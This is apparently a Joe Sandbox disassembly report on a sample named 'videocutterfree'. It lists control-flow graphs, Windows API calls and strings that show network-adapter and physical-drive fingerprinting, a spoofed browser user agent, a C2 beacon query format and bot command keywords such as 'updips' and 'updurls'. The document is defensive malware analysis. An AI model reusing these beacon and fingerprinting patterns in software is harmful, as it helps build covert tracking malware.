                                                                              • Instruction ID: c16b196ddc1dfaae8413345b3d6dd8e757b0686e77b40567bd9179b058fead0e
                                                                              • Opcode Fuzzy Hash: cc10e829798e289c9eaea95da83cda4309410800d4195ac11471a7da668302a1
                                                                              • Instruction Fuzzy Hash: 8C42787250C3819FDB359B78D842BAFBBE9AFD6324F14481DF48587292EB319805C792

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                              • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                              • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                              • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                              • API String ID: 514930453-3667123677
                                                                              • Opcode ID: bc005ef754f3a5303546a32743d4883a9e6c3ebee7d3eb6cc9c7947b2eeee021
                                                                              • Instruction ID: 26a35b0e434a944fb2e6f971c7f33de8a7c2d2a3e5cb9eaf2de76edc7c74b596
                                                                              • Opcode Fuzzy Hash: bc005ef754f3a5303546a32743d4883a9e6c3ebee7d3eb6cc9c7947b2eeee021
                                                                              • Instruction Fuzzy Hash: 1821A770944209AEDF219F65C9447EF7BB8EF41345F0440BAE504B22E1E7789D85CB69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1221 99e756-99e779 LoadLibraryA 1222 99e839-99e840 1221->1222 1223 99e77f-99e78d GetProcAddress 1221->1223 1224 99e793-99e7a3 1223->1224 1225 99e832-99e833 FreeLibrary 1223->1225 1226 99e7a5-99e7b1 GetAdaptersInfo 1224->1226 1225->1222 1227 99e7e9-99e7f1 1226->1227 1228 99e7b3 1226->1228 1229 99e7fa-99e7ff 1227->1229 1230 99e7f3-99e7f9 call 9a2558 1227->1230 1231 99e7b5-99e7bc 1228->1231 1233 99e82d-99e831 1229->1233 1234 99e801-99e804 1229->1234 1230->1229 1235 99e7be-99e7c2 1231->1235 1236 99e7c6-99e7ce 1231->1236 1233->1225 1234->1233 1238 99e806-99e80b 1234->1238 1235->1231 1239 99e7c4 1235->1239 1240 99e7d1-99e7d6 1236->1240 1241 99e818-99e823 call 9a28fc 1238->1241 1242 99e80d-99e815 1238->1242 1239->1227 1240->1240 1243 99e7d8-99e7e5 call 99e4a5 1240->1243 1241->1233 1248 99e825-99e828 1241->1248 1242->1241 1243->1227 1248->1226
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 0099E76C
                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 0099E785
                                                                              • GetAdaptersInfo.IPHLPAPI(?,?), ref: 0099E7AA
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0099E833
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                              • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                              • API String ID: 514930453-3114217049
                                                                              • Opcode ID: 29a5d6a0707e6586a9a3d179ca860a3b3be8ba5b299053ae38cfe0142a056858
                                                                              • Instruction ID: 0c7ca66f7c1dfeca31ea828f3c5156a8c58447df815009ae906ed1d487675a04
                                                                              • Opcode Fuzzy Hash: 29a5d6a0707e6586a9a3d179ca860a3b3be8ba5b299053ae38cfe0142a056858
                                                                              • Instruction Fuzzy Hash: 6D219C75E042099BDF10DBEE9884AEEBBB8AF55310F1441A9E504E7241DB349E458BA1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1498 992b95-992baf 1499 992bb1-992bb9 call 99f8c0 1498->1499 1500 992bc7-992bcb 1498->1500 1509 992bbf-992bc2 1499->1509 1502 992bcd-992bd0 1500->1502 1503 992bdf 1500->1503 1502->1503 1506 992bd2-992bdd call 99f8c0 1502->1506 1504 992be2-992c11 WSASetLastError WSARecv call 9992b8 1503->1504 1511 992c16-992c1d 1504->1511 1506->1509 1512 992d30 1509->1512 1514 992c2c-992c32 1511->1514 1515 992c1f-992c2a call 99f8c0 1511->1515 1513 992d32-992d38 1512->1513 1517 992c34-992c39 call 99f8c0 1514->1517 1518 992c46-992c48 1514->1518 1525 992c3f-992c42 1515->1525 1517->1525 1521 992c4a-992c4d 1518->1521 1522 992c4f-992c60 call 99f8c0 1518->1522 1523 992c66-992c69 1521->1523 1522->1513 1522->1523 1528 992c6b-992c6d 1523->1528 1529 992c73-992c76 1523->1529 1525->1518 1528->1529 1530 992d22-992d2d call 991996 1528->1530 1529->1512 1531 992c7c-992c9a call 99f8c0 call 99166f 1529->1531 1530->1512 1538 992cbc-992cfa WSASetLastError select call 9992b8 1531->1538 1539 992c9c-992cba call 99f8c0 call 99166f 1531->1539 1544 992d08 1538->1544 1545 992cfc-992d06 call 99f8c0 1538->1545 1539->1512 1539->1538 1548 992d0a-992d12 call 99f8c0 1544->1548 1549 992d15-992d17 1544->1549 1553 992d19-992d1d 1545->1553 1548->1549 1549->1512 1549->1553 1553->1504
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992BE4
                                                                              • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 00992C07
                                                                                • Part of subcall function 009992B8: WSAGetLastError.WS2_32(00000000,?,?,00992A51), ref: 009992C6
                                                                              • WSASetLastError.WS2_32 ref: 00992CD3
                                                                              • select.WS2_32(?,?,00000000,00000000,00000000), ref: 00992CE7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Recvselect
                                                                              • String ID: 3'
                                                                              • API String ID: 886190287-280543908
                                                                              • Opcode ID: fd95522ab59c2210d89776c4275d044658eaff7409cc74f344900fa8a854b95a
                                                                              • Instruction ID: be9f2d187227786d8c9413b74aaff9a1818314bfc389d9256730cf3eb7b4eb37
                                                                              • Opcode Fuzzy Hash: fd95522ab59c2210d89776c4275d044658eaff7409cc74f344900fa8a854b95a
                                                                              • Instruction Fuzzy Hash: 00417CB1918301AFDF109F6CC50576BBBE8AF95364F104D2EF899C7281EB75D9408BA2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1555 99e652-99e67d CreateFileA 1556 99e74e-99e755 1555->1556 1557 99e683-99e698 1555->1557 1558 99e69b-99e6bd DeviceIoControl 1557->1558 1559 99e6bf-99e6c7 1558->1559 1560 99e6f6-99e6fe 1558->1560 1563 99e6c9-99e6ce 1559->1563 1564 99e6d0-99e6d5 1559->1564 1561 99e700-99e706 call 9a2558 1560->1561 1562 99e707-99e709 1560->1562 1561->1562 1567 99e70b-99e70e 1562->1567 1568 99e744-99e74d CloseHandle 1562->1568 1563->1560 1564->1560 1565 99e6d7-99e6df 1564->1565 1569 99e6e2-99e6e7 1565->1569 1571 99e72a-99e737 call 9a28fc 1567->1571 1572 99e710-99e719 GetLastError 1567->1572 1568->1556 1569->1569 1573 99e6e9-99e6f5 call 99e4a5 1569->1573 1571->1568 1579 99e739-99e73f 1571->1579 1572->1568 1574 99e71b-99e71e 1572->1574 1573->1560 1574->1571 1578 99e720-99e727 1574->1578 1578->1571 1579->1558
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 0099E671
                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 0099E6AF
                                                                              • GetLastError.KERNEL32 ref: 0099E710
                                                                              • CloseHandle.KERNEL32(?), ref: 0099E747
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                              • String ID: \\.\PhysicalDrive0
                                                                              • API String ID: 4026078076-1180397377
                                                                              • Opcode ID: fa9e42461b4e383a003481c77d61e44f144a14d629621fed71210b01911a2c54
                                                                              • Instruction ID: ea6b4aca2db6032bec5775d08afbd8f4ccaeb9ebdae41dd3590df0dc3c560930
                                                                              • Opcode Fuzzy Hash: fa9e42461b4e383a003481c77d61e44f144a14d629621fed71210b01911a2c54
                                                                              • Instruction Fuzzy Hash: 6C31A071E00219EBCF24DF9DC984AEEBBB9EB45720F24416AF504A7280D7746E00DB91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1581 401a4f-401a77 CreateFileA 1582 401b45-401b4a 1581->1582 1583 401a7d-401a91 1581->1583 1584 401a98-401ac0 DeviceIoControl 1583->1584 1585 401ac2-401aca 1584->1585 1586 401af3-401afb 1584->1586 1589 401ad4-401ad9 1585->1589 1590 401acc-401ad2 1585->1590 1587 401b04-401b07 1586->1587 1588 401afd-401b03 call 402d96 1586->1588 1592 401b09-401b0c 1587->1592 1593 401b3a-401b44 CloseHandle 1587->1593 1588->1587 1589->1586 1594 401adb-401af1 call 402db0 call 4018cc 1589->1594 1590->1586 1596 401b27-401b34 call 402d88 1592->1596 1597 401b0e-401b17 GetLastError 1592->1597 1593->1582 1594->1586 1596->1584 1596->1593 1597->1593 1599 401b19-401b1c 1597->1599 1599->1596 1602 401b1e-401b24 1599->1602 1602->1596
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                              • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                              • GetLastError.KERNEL32 ref: 00401B0E
                                                                              • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                              • String ID: \\.\PhysicalDrive0
                                                                              • API String ID: 4026078076-1180397377
                                                                              • Opcode ID: c8981459f5e706c06cc7695507db81eaa9930dfb08273bf7247f608f6a192452
                                                                              • Instruction ID: 04dbfa7bc106f75310bb79019ca7befe418b3d091205e7bc0cb177ec4d54a964
                                                                              • Opcode Fuzzy Hash: c8981459f5e706c06cc7695507db81eaa9930dfb08273bf7247f608f6a192452
                                                                              • Instruction Fuzzy Hash: 54316B71D01218EACB21EFA5CD849EFBBB9FF41750F20417AE515B22A0E3785E45CB98
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fbc1468ac63fff6d3fcb0251f380921b6e4081b544cf7a34e2d2f59adc7c17f5
                                                                              • Instruction ID: 0d6fb0ce50f1528b041e60c1e09a7fe6294456f0ae413154e5d114ad2335cf56
                                                                              • Opcode Fuzzy Hash: fbc1468ac63fff6d3fcb0251f380921b6e4081b544cf7a34e2d2f59adc7c17f5
                                                                              • Instruction Fuzzy Hash: 5651857210C681EFDB17AF39C8856AAFBE4EF85710F0A499DCAC147212D7366811CB93

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 995ba2-995bd7 1 995bde-995bf3 0->1 2 995c41-995c58 1->2 3 995bf5-995c29 1->3 2->1 6 995c5a-995c75 2->6 4 995c2b-995c3e 3->4 5 995c90-995f04 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 9942c7 GetTickCount call 9958d7 GetVersionExA call 9a38a0 call 9a1d5c * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 9a38a0 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 9a1d5c * 4 QueryPerformanceCounter Sleep call 9a1d5c * 2 call 9a38a0 * 2 3->5 8 995c78-995c8a 4->8 9 995c40 4->9 53 995f08-995f0a 5->53 8->5 9->2 54 995f0c-995f11 53->54 55 995f13-995f15 53->55 56 995f1c Sleep 54->56 57 995f22-995f51 RtlEnterCriticalSection RtlLeaveCriticalSection 55->57 58 995f17 55->58 56->57 59 996029-996035 57->59 58->56 60 996048 59->60 61 99604a-996052 60->61 62 9960c4-9960cb 60->62 61->59 64 996054-99607e 61->64 63 9960cc-9960cf 62->63 65 9960d1-9960ed 63->65 66 9960c3 63->66 64->60 70 996090-996094 64->70 68 9960ab 65->68 69 9960ef-9960f0 65->69 66->62 74 9960b0-9960bd 68->74 71 9960f3-99610c 69->71 72 9960a3-9960a9 70->72 73 996096 70->73 75 99610e 71->75 76 9960c0-9960c2 71->76 72->68 73->74 74->70 77 9960bf 74->77 78 996151-996193 75->78 79 996110-996130 75->79 76->66 76->71 77->63 77->76 81 996194-99619f 78->81 80 996145-99614e 79->80 82 996150 80->82 83 9961a1-9961a4 81->83 84 9961e0-9961e5 81->84 82->78 83->80 87 9961a6 83->87 85 996212-996217 84->85 86 9961e6-9961ec 84->86 90 996218-996228 85->90 91 9961a7-9961c1 85->91 88 99622f-996233 86->88 89 9961ee 86->89 87->82 87->91 92 9961f0-9961f6 88->92 93 996235-996236 88->93 89->92 94 9961cb-9961dc 90->94 100 99622b 90->100 91->94 95 9961f7-9961fb 92->95 97 996238-99623b 93->97 98 9962aa-9962b2 call 99439c 93->98 94->84 95->81 99 9961fd-9961ff 95->99 97->95 102 99623d-996256 97->102 98->53 108 9962b8-9962e3 
RtlEnterCriticalSection RtlLeaveCriticalSection call 9a10ec 98->108 103 996258-996262 99->103 104 996201-99620e 99->104 100->88 102->103 106 99627e-996288 103->106 107 996264-99626a 103->107 104->85 106->53 111 99628e-9962a9 call 9a38a0 106->111 109 99626c-99626e 107->109 110 996270-99627d call 9953ec 107->110 118 99632d-996345 call 9a10ec 108->118 119 9962e5-9962f4 call 9a10ec 108->119 109->106 110->106 111->98 125 99634b-99634d 118->125 126 9965ee-9965fd call 9a10ec 118->126 119->118 124 9962f6-996305 call 9a10ec 119->124 124->118 136 996307-996316 call 9a10ec 124->136 125->126 129 996353-9963fe call 9a1d5c RtlEnterCriticalSection RtlLeaveCriticalSection call 9a38a0 * 5 call 99439c * 2 125->129 133 9965ff-996601 126->133 134 996642-996651 call 9a10ec 126->134 187 99643b 129->187 188 996400-996402 129->188 133->134 137 996603-99663d call 9a38a0 RtlEnterCriticalSection RtlLeaveCriticalSection 133->137 147 996653-996661 call 995a29 call 995b37 134->147 148 996666-996675 call 9a10ec 134->148 136->118 149 996318-996327 call 9a10ec 136->149 137->53 147->53 160 99667b-99667d 148->160 161 99698c-99699b call 9a10ec 148->161 149->53 149->118 160->161 162 996683-99669c call 99439c 160->162 161->53 171 9969a1-9969cd call 9a1d5c call 9a38a0 call 99439c 161->171 162->53 172 9966a2-996770 call 9a11c8 call 991ba7 162->172 193 9969cf-9969d1 call 99534d 171->193 194 9969d6-9969dd call 9a1d24 171->194 190 996772 call 99143f 172->190 191 996777-996798 RtlEnterCriticalSection 172->191 195 99643f-99646d call 9a1d5c call 9a38a0 call 99439c 187->195 188->187 192 996404-996416 call 9a10ec 188->192 190->191 197 99679a-9967a1 191->197 198 9967a4-99680b RtlLeaveCriticalSection call 993c67 call 993d7e call 9970ea 191->198 192->187 208 996418-996439 call 99439c 192->208 193->194 194->53 221 99646f-99647e call 9a2396 195->221 222 9964ae-9964b7 call 9a1d24 195->222 197->198 219 996811-996853 call 9994d4 198->219 220 996973-996987 call 997db2 198->220 208->195 232 996859-996860 219->232 233 
99693d-99696e call 997199 call 9933b2 219->233 220->53 221->222 231 996480 221->231 234 9964bd-9964d5 call 9a28fc 222->234 235 9965dc-9965e9 222->235 236 996485-996497 call 9a1600 231->236 238 996863-996868 232->238 233->220 244 9964e1 234->244 245 9964d7-9964df call 9984e6 234->245 235->53 251 996499 236->251 252 99649c-9964ac call 9a2396 236->252 238->238 242 99686a-9968af call 9994d4 238->242 242->233 257 9968b5-9968bb 242->257 250 9964e3-996589 call 9995fe call 993863 call 995119 call 993863 call 9998a4 call 9999be 244->250 245->250 277 99658b call 99380b 250->277 278 996590-9965bb Sleep call 9a06a0 250->278 251->252 252->222 252->236 260 9968be-9968c3 257->260 260->260 262 9968c5-996900 call 9994d4 260->262 262->233 267 996902-99693c call 99bec6 262->267 267->233 277->278 282 9965bd-9965c6 call 994100 278->282 283 9965c7-9965d5 278->283 282->283 283->235 285 9965d7 call 99380b 283->285 285->235
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc$Heap_memset$CriticalSection$AllocateProcess$AddressEnterHandleModuleProcSleep$CountCounterInitializeLeavePerformanceQueryTickVersion
                                                                              • String ID: {?$-.%7$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                              • API String ID: 2188067488-2434742263
                                                                              • Opcode ID: af10b65474d8083a8aaccd200d03b517fdc35b58fdb3b390a01bccaf3de37241
                                                                              • Instruction ID: a52b925224ba821c34b674143cc8fbd866aa5ec0c439bc38bd876e05ef4f7154
                                                                              • Opcode Fuzzy Hash: af10b65474d8083a8aaccd200d03b517fdc35b58fdb3b390a01bccaf3de37241
                                                                              • Instruction Fuzzy Hash: 54A13471D187809FD700AF799C46B5BBFE8AF86320F15062DF588972D2D7789901CB92

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 803 9961c3-9961c6 804 9961cb-9961dc 803->804 805 9961e0-9961e5 804->805 806 996212-996217 805->806 807 9961e6-9961ec 805->807 810 996218-996228 806->810 811 9961a7-9961c1 806->811 808 99622f-996233 807->808 809 9961ee 807->809 812 9961f0-9961f6 808->812 813 996235-996236 808->813 809->812 810->804 820 99622b 810->820 811->804 814 9961f7-9961fb 812->814 816 996238-99623b 813->816 817 9962aa-9962b2 call 99439c 813->817 818 9961fd-9961ff 814->818 819 996194-99619f 814->819 816->814 822 99623d-996256 816->822 831 995f08-995f0a 817->831 832 9962b8-9962e3 RtlEnterCriticalSection RtlLeaveCriticalSection call 9a10ec 817->832 823 996258-996262 818->823 824 996201-99620e 818->824 819->805 825 9961a1-9961a4 819->825 820->808 822->823 827 99627e-996288 823->827 828 996264-99626a 823->828 824->806 829 996145-99614e 825->829 830 9961a6 825->830 827->831 835 99628e-9962a9 call 9a38a0 827->835 833 99626c-99626e 828->833 834 996270-99627d call 9953ec 828->834 836 996150 829->836 830->811 830->836 838 995f0c-995f11 831->838 839 995f13-995f15 831->839 850 99632d-996345 call 9a10ec 832->850 851 9962e5-9962f4 call 9a10ec 832->851 833->827 834->827 835->817 843 996151-996193 836->843 840 995f1c Sleep 838->840 844 995f22-995f51 RtlEnterCriticalSection RtlLeaveCriticalSection 839->844 845 995f17 839->845 840->844 843->819 847 996029-996035 844->847 845->840 855 996048 847->855 860 99634b-99634d 850->860 861 9965ee-9965fd call 9a10ec 850->861 851->850 857 9962f6-996305 call 9a10ec 851->857 858 99604a-996052 855->858 859 9960c4-9960cb 855->859 857->850 878 996307-996316 call 9a10ec 857->878 858->847 864 996054-99607e 858->864 862 9960cc-9960cf 859->862 860->861 866 996353-9963fe call 9a1d5c RtlEnterCriticalSection RtlLeaveCriticalSection call 9a38a0 * 5 call 99439c * 2 860->866 873 9965ff-996601 861->873 874 996642-996651 call 9a10ec 861->874 868 9960d1-9960ed 862->868 869 9960c3 862->869 
864->855 879 996090-996094 864->879 938 99643b 866->938 939 996400-996402 866->939 876 9960ab 868->876 877 9960ef-9960f0 868->877 869->859 873->874 880 996603-99663d call 9a38a0 RtlEnterCriticalSection RtlLeaveCriticalSection 873->880 898 996653-996661 call 995a29 call 995b37 874->898 899 996666-996675 call 9a10ec 874->899 887 9960b0-9960bd 876->887 882 9960f3-99610c 877->882 878->850 900 996318-996327 call 9a10ec 878->900 885 9960a3-9960a9 879->885 886 996096 879->886 880->831 890 99610e 882->890 891 9960c0-9960c2 882->891 885->876 886->887 887->879 894 9960bf 887->894 890->843 897 996110-996130 890->897 891->869 891->882 894->862 894->891 897->829 898->831 911 99667b-99667d 899->911 912 99698c-99699b call 9a10ec 899->912 900->831 900->850 911->912 913 996683-99669c call 99439c 911->913 912->831 922 9969a1-9969cd call 9a1d5c call 9a38a0 call 99439c 912->922 913->831 923 9966a2-996770 call 9a11c8 call 991ba7 913->923 944 9969cf-9969d1 call 99534d 922->944 945 9969d6-9969dd call 9a1d24 922->945 941 996772 call 99143f 923->941 942 996777-996798 RtlEnterCriticalSection 923->942 946 99643f-99646d call 9a1d5c call 9a38a0 call 99439c 938->946 939->938 943 996404-996416 call 9a10ec 939->943 941->942 948 99679a-9967a1 942->948 949 9967a4-99680b RtlLeaveCriticalSection call 993c67 call 993d7e call 9970ea 942->949 943->938 959 996418-996439 call 99439c 943->959 944->945 945->831 972 99646f-99647e call 9a2396 946->972 973 9964ae-9964b7 call 9a1d24 946->973 948->949 970 996811-996853 call 9994d4 949->970 971 996973-996987 call 997db2 949->971 959->946 983 996859-996860 970->983 984 99693d-99696e call 997199 call 9933b2 970->984 971->831 972->973 982 996480 972->982 985 9964bd-9964d5 call 9a28fc 973->985 986 9965dc-9965e9 973->986 987 996485-996497 call 9a1600 982->987 989 996863-996868 983->989 984->971 995 9964e1 985->995 996 9964d7-9964df call 9984e6 985->996 986->831 1002 996499 987->1002 1003 99649c-9964ac call 9a2396 987->1003 989->989 993 99686a-9968af call 9994d4 
989->993 993->984 1008 9968b5-9968bb 993->1008 1001 9964e3-996589 call 9995fe call 993863 call 995119 call 993863 call 9998a4 call 9999be 995->1001 996->1001 1028 99658b call 99380b 1001->1028 1029 996590-9965bb Sleep call 9a06a0 1001->1029 1002->1003 1003->973 1003->987 1011 9968be-9968c3 1008->1011 1011->1011 1013 9968c5-996900 call 9994d4 1011->1013 1013->984 1018 996902-99693c call 99bec6 1013->1018 1018->984 1028->1029 1033 9965bd-9965c6 call 994100 1029->1033 1034 9965c7-9965d5 1029->1034 1033->1034 1034->986 1036 9965d7 call 99380b 1034->1036 1036->986
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Similarity
• API ID: _memset$CriticalSection$EnterLeave_malloc_strtok$Sleep_free_swscanf
• String ID: "gk$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
• API String ID: 3973504402-1155504658
• Opcode ID: 63ac1c79d5ffec96fa5e9d5424e21ab51b9bea5e4ed840c455200a20b890c4a9
• Instruction ID: 3445c01b6084af545b123fde3d8d73f3a6146ee49741d9a31b655eec7f769db0
• Opcode Fuzzy Hash: 63ac1c79d5ffec96fa5e9d5424e21ab51b9bea5e4ed840c455200a20b890c4a9
• Instruction Fuzzy Hash: E9B1A97164C3409BDF25ABBC9D02BAF7BE89FD6724F14042DF594972E2DA21E800C792

Control-flow Graph
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00991D11
• GetLastError.KERNEL32 ref: 00991D23
  • Part of subcall function 00991712: __EH_prolog.LIBCMT ref: 00991717
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00991D59
• GetLastError.KERNEL32 ref: 00991D6B
• __beginthreadex.LIBCMT ref: 00991DB1
• GetLastError.KERNEL32 ref: 00991DC6
• CloseHandle.KERNEL32(00000000), ref: 00991DDD
• CloseHandle.KERNEL32(00000000), ref: 00991DEC
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00991E14
• CloseHandle.KERNEL32(00000000), ref: 00991E1B
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Similarity
• API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
• String ID: thread$thread.entry_event$thread.exit_event
• API String ID: 831262434-3017686385
• Opcode ID: 0c65bf8851f6b446373833ef66ce583a4e79b5b28841cca8c0cfef3bd04dc641
• Instruction ID: c65b8e9ef8596fa1f78b29517191a5868585e37725d6a412e590a1dd67834591
• Opcode Fuzzy Hash: 0c65bf8851f6b446373833ef66ce583a4e79b5b28841cca8c0cfef3bd04dc641
• Instruction Fuzzy Hash: A4318F719043029FDB00EF29C848B2BBBE8FB84760F10492DF955C72A1DB709C49CB92

Control-flow Graph
APIs
• __EH_prolog.LIBCMT ref: 00994D8B
• RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00994DB7
• RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00994DC3
  • Part of subcall function 00994BED: __EH_prolog.LIBCMT ref: 00994BF2
  • Part of subcall function 00994BED: InterlockedExchange.KERNEL32(?,00000000), ref: 00994CF2
• RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00994E93
• RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00994E99
• RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00994EA0
• RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00994EA6
• RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 009950A7
• RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 009950AD
• RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 009950B8
• RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 009950C1
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
• String ID:
• API String ID: 2062355503-0
• Opcode ID: 937e9fd4707467542967eac08f92b373a5994733083be99dee2f49c3c0955caf
• Instruction ID: a5a59e01123ca876400efa3ba77588e6687c0d7b4e88abf4106f140522bfd560
• Opcode Fuzzy Hash: 937e9fd4707467542967eac08f92b373a5994733083be99dee2f49c3c0955caf
• Instruction Fuzzy Hash: 1AB1AE31D0421DDFEF21DFA8D840BEEBBB8AF44314F10415AE40476281DB786A89CFA2

Control-flow Graph
Memory Dump Source
• Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
Similarity
• API ID: CloseValue
• String ID: -Pat$KCU:$h "H$rope$rty
• API String ID: 3132538880-2216428058
• Opcode ID: 82c1ec06655e9e16720288c49c00243484a3c03b613a039afd8d34543cb8d91c
• Instruction ID: 9adcfc74a9bdc4fe4e00f5127b96b60a39d9cb5ff0fd7c0e9d3230681216cd64
• Opcode Fuzzy Hash: 82c1ec06655e9e16720288c49c00243484a3c03b613a039afd8d34543cb8d91c
• Instruction Fuzzy Hash: 90E04FB0004B06CFC6308F59D24846ABEF5FB20301B214E2E909375AA0C33A6756DF9F

Control-flow Graph
APIs
• FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
• GetLastError.KERNEL32 ref: 00401F86
• SizeofResource.KERNEL32(00000000), ref: 00401F93
• LoadResource.KERNEL32(00000000), ref: 00401FAD
• LockResource.KERNEL32(00000000), ref: 00401FB4
